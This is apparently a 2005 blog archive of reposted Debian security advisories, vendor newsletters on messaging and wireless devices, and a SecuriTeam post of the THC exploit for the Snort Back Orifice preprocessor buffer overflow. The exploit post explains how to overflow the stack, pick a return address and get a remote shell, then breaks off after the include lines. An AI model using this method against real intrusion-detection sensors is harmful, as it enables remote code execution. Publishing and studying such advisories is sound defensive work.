Search This Blog

Friday, October 28, 2005

[SECURITY] [DSA 877-1] New gnump3d packages fix several vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 877-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
October 28th, 2005 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : gnump3d
Vulnerability : cross-site scripting, directory traversal
Problem type : remote
Debian-specific: no
CVE ID : CVE-2005-3122 CVE-2005-3123

Steve Kemp discovered two vulnerabilities in gnump3d, a streaming
server for MP3 and OGG files. The Common Vulnerabilities and
Exposures Project identifies the following problems:

CVE-2005-3122

The 404 error page does not strip malicious javascript content
from the resulting page, which would be executed in the victims
browser.

CVE-2005-3123

By using specially crafting URLs it is possible to read arbitary
files to which the user of the streaming server has access to.

The old stable distribution (woody) does not contain a gnump3d package.

For the stable distribution (sarge) these problems have been fixed in
version 2.9.3-1sarge2.

For the unstable distribution (sid) these problems have been fixed in
version 2.9.6-1.

We recommend that you upgrade your gnump3d package.

Upgrade Instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2.dsc
Size/MD5 checksum: 575 16114607fe426691518743a80a15deda
http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3.orig.tar.gz
Size/MD5 checksum: 616250 1a0d6a10f6ac2354e1f8c6000665f299
http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2.diff.gz
Size/MD5 checksum: 14298 9fbb9305ab4282b7957be8203dd6fb35

Architecture independent components:

http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2_all.deb
Size/MD5 checksum: 603662 a94ff8504be400030a5f5fdb08987da0

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDYfRjW5ql+IAeqTIRAiSQAJ9J3KU5U/TV0XK6xPLNXlY8E9nhXgCeIKQI
KQjf5W+ekqi1NjEw71BXrLE=
=Je47
-----END PGP SIGNATURE-----

--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Thursday, October 27, 2005

Jupiter Webcast Invite: Valuing Web Page Real Estate




Register today for this upcoming Jupiter Webcast: 
Valuing Web Page Real Estate

November 14, 2005 -- 2:00pm EST / 11:00am PST

Registration is FREE for qualified attendees. This Webcast is sponsored by Omniture. For more information and to sign up today visit http://www.jupiterwebevents.com/webcasts/omniture_nov14.html

Speakers: 
Patti Freeman Evans, Analyst, JupiterResearch
Eric T. Peterson, Analyst, JupiterResearch

Retailers have long understood and measured the effectiveness of their physical square footage and their print catalog pages. This practice is very beneficial for understanding how to best monetize a Web site as well. 

In this Webcast, analysts Patti Freeman Evans and Eric Peterson will showcase recent research conducted by JupiterResearch that establishes a framework for valuing links, pages and paths within your Web site. 

Attend this Webcast and learn: 
- Insights from the offline catalogue and retail world that can be leveraged to 
  assign value to Web site pages and elements.
- Key factors behind Web site value and their impact.
- Best practices to use to evaluate and optimize Web site pages and elements for faster ROI. 

Registration is FREE for qualified attendees. To sign up visit http://cp.jupiterweb.com/index.php/1591_default/

Jupiter Webcasts are educational Web conferences focusing on IT and Internet related business issues. Each Webcast runs approximately 45 to 60 minutes in total, and integrates a PowerPoint presentation with audio. 

After registering for the event through our Web site, if you qualify you will receive an e-mail providing instructions on how to access the presentation prior to the event. 

This Webcast is sponsored by Omniture, Inc. Omniture is the pioneer of next-generation web analytics technology and is the most experienced provider of adaptable solutions to large, complex websites. For more information visit http://www.omniture.com

For additional information about sponsoring a Jupiter Webinar, 
please contact Mary Warley at webeventsales@jupitermedia.com 
or call 508-660-1404. 

If you wish to be removed from future Jupiter Webevents announcement mailings, please click here .

Jupitermedia Corporation * 23 Old Kings Highway South * Darien, CT * 06820

 

 

 

What is your preferred mode of communication?

NETWORK WORLD NEWSLETTER: MICHAEL OSTERMAN ON MESSAGING
10/27/05
Today's focus: What is your preferred mode of communication?

Dear security.world@gmail.com,

In this issue:

* Our personal communication policies
* Links related to Messaging
* Featured reader resource
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117977
_______________________________________________________________
USERS AWASH IN EMERGING WIRELESS OPTIONS

The days of simply giving traveling employees a cell phone for
talking and a laptop for dial-up data are long gone, replaced by
a complex landscape of overlapping choices. There are decisions
to be made regarding devices, carrier contracts, performance and
reach. How do you know which decisions are the right ones? Click
here for more:
http://www.fattail.com/redir/redirect.asp?CID=118166
_______________________________________________________________

Today's focus: What is your preferred mode of communication?

By Michael Osterman

Almost all of us have policies and preferences as they relate to
communications. For example, we don't want to be called at home
after a certain time of night or before a certain time in the
morning on weekdays; we may not want to be called during dinner
or during a Monday Night Football game, etc. We may also have
similar types of policies at work, even if those policies are
unstated, such as not wanting to be called by telephone when
working on a deadline that's less than an hour away.

I believe that these policies will ultimately result in the
convergence of workplace e-mail, instant messaging (IM), fax and
voice into a single communications hierarchy that is driven
largely by policies stored in an enterprise directory. Using
such a capability, you might come up with the following
policies:

* Office voice is my preferred mode of communication and IM is
  secondary between 8 a.m. and 5 p.m. unless my presence status is
  busy, then default to e-mail.

* Outside of these hours, IM is my preferred mode and e-mail is
  secondary unless my presence status is busy, then default to
  voice.

* If a problem is urgent and my IM status is away, my preference
  is cell.

Using a system like this would do two things. First, for
recipients it would allow them to receive communications using
the medium of their choice based on the time of day, their
presence status, how busy they are at a given time, etc. For
senders, it would free them from having to guess how recipients
want to be contacted or the most efficient way to contact them,
and it would free them from having to know all of the modes of
communication that a recipient has available to them. For
example, if all a sender knows is the recipient's e-mail
address, the directory would be able to send the message to any
device the user has available based on that user's preferences.

Some of these capabilities already exist in various forms, but I
believe that this type of hierarchy, driven primarily by
recipients of communications and not senders, will become the
norm. I'd appreciate your feedback on how useful this would be
or how ridiculous it sounds: Please drop me a line at
<mailto:michael@ostermanresearch.com>.

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlmsg9547>
2. How to respond to a security breach
<http://www.networkworld.com/nlmsg9756>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlmsg9548>
4. Cartoon of the Week <http://www.networkworld.com/nlmsg9549>

5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlmsg9757>

_______________________________________________________________
To contact: Michael Osterman

Michael D. Osterman is the principal of Osterman Research
<http://www.ostermanresearch.com/>, a market research firm that
helps organizations understand the markets for messaging,
directory and related products and services. He can be reached
by clicking here <mailto:michael@ostermanresearch.com>
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117976
_______________________________________________________________
ARCHIVE LINKS

Archive of the Messaging newsletter:
http://www.networkworld.com/newsletters/gwm/index.html
_______________________________________________________________
CASE STUDY WEBCAST: OfficeMax Takes Email Security to the Max

Much more than just a product showcase, this new webcast is an
in-depth examination of how an enterprise of 35,000 users on
three continents developed a corporate email defense strategy.
Tune in 24/7 and come away with proven solutions:
http://www.fattail.com/redir/redirect.asp?CID=118308
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Device makers have some fun with new offerings

NETWORK WORLD NEWSLETTER: KEITH SHAW ON WIRELESS COMPUTING
DEVICES
10/27/05
Today's focus: Device makers have some fun with new offerings

Dear security.world@gmail.com,

In this issue:

* News from Samsung, Verizon and Sony
* Links related to Wireless Computing Devices
* Featured reader resource
_______________________________________________________________
This newsletter is sponsored by Zultys
Network World Executive Guide: The Real World of VoIP

Join the Network World editors in an Executive Guide dedicated
to VoIP. Learn about the time and cost of planning, installing
and troubleshooting VoIP. Understand the user experience and
where the technology is headed. This timely information is
crucial to all forward thinking IT executives considering VoIP.

http://www.fattail.com/redir/redirect.asp?CID=118134
_______________________________________________________________
USERS AWASH IN EMERGING WIRELESS OPTIONS

The days of simply giving traveling employees a cell phone for
talking and a laptop for dial-up data are long gone, replaced by
a complex landscape of overlapping choices. There are decisions
to be made regarding devices, carrier contracts, performance and
reach. How do you know which decisions are the right ones? Click
here for more:
http://www.fattail.com/redir/redirect.asp?CID=118179
_______________________________________________________________

Today's focus: Device makers have some fun with new offerings

By Keith Shaw

Last issue we highlighted some new, serious,
"business-optimized" devices launched recently. Today, we're
going to highlight some new devices that let users have some fun
(although some business users may be able to still get some
value out of them).

* Samsung, Verizon launch camera, camcorder, MP3 player in one
device

Samsung and Verizon Wireless have launched the SCH-a970 mobile
phone, which includes a swivel-flip design (see it at Verizon's
Web site http://www.networkworld.com/nlmobile9271 ), a
2-megapixel camera, camcorder and MP3 digital music player.

The a970 includes a 262,000-color LCD screen, VoiceSignal's
VoiceMode speech-to-text dictation technology, and supports
Verizon's VCAST service, which lets users download video clips
to their phone (for an extra $15 per month).

Users can store their pictures, videos and music on a removable
TransFlash memory card that's sold separately. The phone is now
available for $299.99 after a $50 mail-in rebate and two-year
agreement. The phone has Bluetooth, but only for the headset and
hands-free accessories profiles (users won't be able to use
Bluetooth to connect their laptops to the Internet, for
example).

* Samsung and Verizon find the music in you

If music is more your thing, then Verizon Wireless and Samsung
hve a new phone that will turn you into a "mobile DJ." The
recently launched SCH-a950 includes dual stereo speakers and
enhanced sound quality for listing to ring tones, music/video
playback and even speakerphone conversations. The a950 includes
TransFlash memory card support for carrying around MP3 music
files (cards sold separately), and a jog dial on the phone that
lets users scroll through playlists quickly.

The a950 also supports Verizon's VCAST, and includes a
1.3-megapixel digital camera/camcorder for shooting photos and
videos. Bluetooth is also supported, but only for headset and
hands-free accessories. The phone will cost $149.99 after a $100
mail-in rebate and two-year agreement. More details are
available at the Verizon Wireless Web site
http://www.networkworld.com/nlmobile9272.

* Sony Vaio's holiday colors

If you're sick of your plain black notebook, Sony wants to add
some color to your life, or at least to your notebook. The
company recently introduced a line of slim, portable notebooks
with five different "fashion colors." The Vaio FJ series of
notebooks will include colors such as Onyx Black, Pearl White,
Sky Blue, Jade Green and Raspberry Red on their casings and palm
rests. The notebooks themselves will have a full-sized keyboard,
14.1-inch widescreen display (with Sony's XBRITE-ECO
technology), integrated 802.11b/g wireless, an on-board DVD
drive (+R double layer and +/- RW drive), and a built-in camera
and microphone for video chatting. The Onyx Black notebook,
starting at $1,400, will be available by the end of this month,
while the other colors will be available next month. Pre-orders
are being accepted here http://sony.com/fj.

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
http://www.networkworld.com/nlmobile9596
2. How to respond to a security breach
http://www.networkworld.com/nlmobile9772
3. School traps infected PCs in its web
http://www.networkworld.com/nlmobile9597
4. Cartoon of the Week http://www.networkworld.com/nlmobile9598

5. CTO: BellSouth lost 9 COs to Katrina
http://www.networkworld.com/nlmobile9773

_______________________________________________________________
To contact: Keith Shaw

Keith Shaw is Senior Editor, Product Testing, at Network World.
In addition, he writes the " Cool Tools
http://www.networkworld.com/columnists/cooltools.html " column,
which looks at gizmos, gadgets and other mobile computing
devices.

You can reach Keith at mailto:kshaw@nww.com.
_______________________________________________________________
This newsletter is sponsored by Intel
The 64-bit Tipping Point

With the launch of the new Intel Xeon processor with Intel
Extended Memory 64 Technology (Intel EM64T), the industry is
poised for a large-scale migration to 64-bit computing.
Read how Intel processor-based platforms offer unparalleled
flexibility for optimizing capacity, performance, and business
value across the full range of environments that will
be part of this movement.
http://www.fattail.com/redir/redirect.asp?CID=118110
_______________________________________________________________
ARCHIVE LINKS

Archive of the Wireless Computing Devices newsletter:
http://www.networkworld.com/newsletters/mobile/index.html Keith
Shaw's Cool Tools:
http://www.networkworld.com/columnists/cooltools.html
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

http://www.networkworld.com/news/2005/101005-grid.html
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
http://www.nwwsubscribe.com/Changes.aspx

To change your e-mail address, go to:
http://www.nwwsubscribe.com/ChangeMail.aspx

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: mailto:jcaruso@nww.com

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: mailto:sponsorships@nwfusion.com

Copyright Network World, Inc., 2005

[SECURITY] [DSA 874-1] New lynx packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 874-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
October 27th, 2005 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : lynx
Vulnerability : buffer overflow
Problem type : remote
Debian-specific: no
CVE ID : CVE-2005-3120

Ulf Härnhammar discovered a buffer overflow in lynx, a text-mode
browser for the WWW that can be remotely exploited. During the
handling of Asian characters when connecting to an NNTP server lynx
can be tricked to write past the boundary of a buffer which can lead
to the execution of arbitrary code.

For the old stable distribution (woody) this problem has been fixed in
version 2.8.4.1b-3.3.

For the stable distribution (sarge) this problem has been fixed in
version 2.8.5-2sarge1.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your lynx package.

Upgrade Instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

Source archives:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3.dsc
Size/MD5 checksum: 579 117f4e3d95a601741dc672012719042c
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3.diff.gz
Size/MD5 checksum: 14448 5e5d819520415baa0d91f75f0ee4f0af
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b.orig.tar.gz
Size/MD5 checksum: 2557510 053a10f76b871e3944c11c7776da7f7a

Alpha architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_alpha.deb
Size/MD5 checksum: 1610266 c887b1d0598b99fe1e3f45fedaaf3321

ARM architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_arm.deb
Size/MD5 checksum: 1487698 fb290d8440ef3b2b59f10e270b1d7bb6

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_i386.deb
Size/MD5 checksum: 1442878 31da62cb1f065acc2f65f2fd4481d530

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_ia64.deb
Size/MD5 checksum: 1762578 e57e52ed11ea52b55d6a5ede09b466a8

HP Precision architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_hppa.deb
Size/MD5 checksum: 1555440 4beb62a33cc2c0f00a45e69bed8b5591

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_m68k.deb
Size/MD5 checksum: 1405626 7f8d46f3d143781364337b666a55fa42

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_mips.deb
Size/MD5 checksum: 1507782 ae2ce1ddbe4855967d050a3e64e42e26

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_mipsel.deb
Size/MD5 checksum: 1503970 08e80c500a4d57a4e47fc45dbf0ebfe3

PowerPC architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_powerpc.deb
Size/MD5 checksum: 1491262 2b58dece4ae0a8a98b31e2f8eba40d13

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_s390.deb
Size/MD5 checksum: 1463360 1e5419b8db89374ea1c96f1219fe6e15

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_sparc.deb
Size/MD5 checksum: 1492728 f4da20fe1ac83ee9adf37d49bb896c63

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1.dsc
Size/MD5 checksum: 614 e7d5a14aafd2e9775c3175e44e3f9964
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1.diff.gz
Size/MD5 checksum: 14891 59cf146b8defbfa1b78df4306b951441
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5.orig.tar.gz
Size/MD5 checksum: 2984352 5f516a10596bd52c677f9bfd9579bc28

Alpha architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_alpha.deb
Size/MD5 checksum: 1994554 8a9eb6cd8ee34ad17aa06b912b588659

AMD64 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_amd64.deb
Size/MD5 checksum: 1881684 5afcd53828326a0cb056681047bd48e6

ARM architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_arm.deb
Size/MD5 checksum: 1852912 de530d45ce98e68932ec4624abd67201

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_i386.deb
Size/MD5 checksum: 1852488 ba9125c2da9c21a8bcd173ff82948a28

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_ia64.deb
Size/MD5 checksum: 2128374 156c023772481f6e9f8629c44082c94d

HP Precision architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_hppa.deb
Size/MD5 checksum: 1909574 24bbbc72ab025249a3adaa7717b316ff

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_m68k.deb
Size/MD5 checksum: 1780590 449249ca3e257a33a5a9d7da16379076

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_mips.deb
Size/MD5 checksum: 1894006 f30b06596b5ed9d881e1f3ba767aca2a

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_mipsel.deb
Size/MD5 checksum: 1889486 0b650edf6ca51547aedd7c7754bbda99

PowerPC architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_powerpc.deb
Size/MD5 checksum: 1878284 d90c1dc3fb2d5be179b827c32c14e222

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_s390.deb
Size/MD5 checksum: 1866758 60f30f0ebd7556799e565b4411a8d429

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_sparc.deb
Size/MD5 checksum: 1861536 85c12b7bd67f9800b49ab4b6b97a1dfd

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDYIifW5ql+IAeqTIRAtcXAJ9M3xJh6sypyxujf2lLUPpprsMw7ACgnzU3
faJgn6sAKnC3FOgrps21jeY=
=pCOX
-----END PGP SIGNATURE-----

--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

[EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Snort Back Orifice Preprocessor Buffer Overflow (Exploit)
------------------------------------------------------------------------

SUMMARY

<http://www.snort.org/> Snort is a widely-deployed, open-source network
intrusion detection system (IDS). Snort preprocessors are modular plugins
that extend functionality by operating on packets before the detection
engine is run.

Presented here is an exploit for the Snort Back Orifice preprocessor
buffer overflow. Exploiting a vulnerable system could allow a remote
attacker to execute arbitrary code.

DETAILS

Vulnerable Systems:
* Snort versions 2.4.0 to 2.4.2
* Sourcefire Intrusion Sensors

Exploit:
/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by rd@thc.org
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/

/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i < len ) {
* plaintext = (char) (*pkt_data ^ (BoRand()%256));
* *buf_ptr = plaintext;
* i++;
* pkt_data++;
* buf_ptr++;
*
* len is taken from the BO packet header, so its a buffer
* overflow when len > buf1 size.
*
* The exchange of data between the BO client and server is
* done using encrypted UDP packets
*
* BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html)
* Mnemonic Size in bytes
* MAGIC 8
* LEN 4
* ID 4
* T 1
* DATA variable
* CRC 1
*
* On x86, because of the stack layout, we end up overwriting
* the loop counter (i and len). To solve this problem, we
* can set back the approriate value for i and len. We can
* also able to set a NULL byte to stop the loop.
*
* There is no chance for bruteforce, snort will die after the
* first bad try. On Linux system with kernel 2.6 with VA
* randomized, it would be much harder for a reliable exploit.
*
*
* In case of _non-optimized_ compiled snort binary, the stack
* would looks like this:
*
* [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data]
*
* The exploit could be reliable in this case, by using a
* pop/ret return addess. Lets send to snort a UDP packet
* as the following:
*
* [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][
shellcode ]
* [ Encrypted ][ Non
Encrypted ]
*
* When the overwriting loop stop, pkt_data will point to
* the memory after return address (NOP part) in raw packet
* data. So, using a return address that points to POP/RET
* instructions would be enough for a reliable exploit.
* (objdump -d binary|grep -B1 ret|grep -A1 pop to find one)
*
* This method will work well under linux kernel 2.6 with VA
* randomized also.
*
* In case of optimized binary, it would be harder since
* the counter i, len and buffer pointers could/possibly be
* registered variables. And the register points to buffer
* get poped from stack when the funtion return. In this case,
* the return address should be hard-coded but it would be
* unreliable (especially on linux kernel 2.6 with VA
* randomization patch).
*
* This exploit would generally work. Providing that you know
* how to find and use correct offsets and return address :>
*
*
* Example:
*
* $ ./THCsnortbo
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Usage: ./THCsnortbo host target
*
* Available Targets:
* 1 | manual testing gcc with -O0
* 2 | manual testing gcc with -O2
*
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
*
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>

Wednesday, October 26, 2005

Pronto provides glue for municipal, public safety nets

NETWORK WORLD NEWSLETTER: JOANIE WEXLER ON WIRELESS IN THE
ENTERPRISE
10/26/05
Today's focus: Pronto provides glue for municipal, public
safety nets

Dear security.world@gmail.com,

In this issue:

* Municipalities band together into national network
* Links related to Wireless in the Enterprise
* Featured reader resource
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117984
_______________________________________________________________
USERS AWASH IN EMERGING WIRELESS OPTIONS

The days of simply giving traveling employees a cell phone for
talking and a laptop for dial-up data are long gone, replaced by
a complex landscape of overlapping choices. There are decisions
to be made regarding devices, carrier contracts, performance and
reach. How do you know which decisions are the right ones? Click
here for more:
http://www.fattail.com/redir/redirect.asp?CID=118181
_______________________________________________________________

Today's focus: Pronto provides glue for municipal, public
safety nets

By Joanie Wexler

You might recall my recent coverage of the September CTIA
Wireless Association show, where former FCC Chairman Reed Hundt
begged the wireless industry to weave together an interoperable
nationwide public safety network.

Shortly thereafter, Pronto Networks announced it had signed up a
slew of municipalities to connect into a common, nationwide
broadband wireless network, in large part to serve public safety
applications. (It so happens, Hundt was quoted in Pronto's press
release announcing the effort, which it calls the UniFi Digital
Communities Grid. Coincidence? I think not! Reed sits on
Pronto's board of directors, according to the company's Web
site.)

Pronto, by the way, is in the business of offering operations
support services (OSS), such as billing, settlement, security,
provisioning and configuration, to public wireless LAN hot spot
services. For the UniFi Grid effort, the company offers one free
Network Services Controller to any municipality wishing to join.

The controller provides Wi-Fi access to the other networks
connecting to the grid and supports 200 users. The controller is
also the platform for the application services and OSS.

The service platform is the glue that binds together Wi-Fi
(802.11), WiMAX (802.16), mesh topologies and public safety
network infrastructures at the lower network layers, making all
communications and services function in a common way across the
local municipal networks the various cities choose to deploy.

At least 43 municipalities in California, Florida,
Massachusetts, New Jersey, New York, Ohio and Texas are already
signed on. Participating municipalities have agreed to give
reciprocal access to all government workers from participating
communities. Cities have the option to charge for access to
generate additional revenue or can opt to allow visitors to roam
for free on their network.

Pronto says it has committed to invest up to $15 million in
products and services to connect up to 500 municipalities in the
next 18 months. The company's presentation materials indicate
support for hierarchical control of emergency policies,
connecting city and state public safety organizations to federal
organizations such as the Federal Emergency Management Agency
and the Department of Homeland Security.

Other applications include enabling inter-municipality roaming
services to citizens, automated meter reading (AMR), traffic and
pedestrian control, video surveillance, and supervisory control
and data acquisition (SCADA) applications for water and
wastewater treatment. They are provided by software development
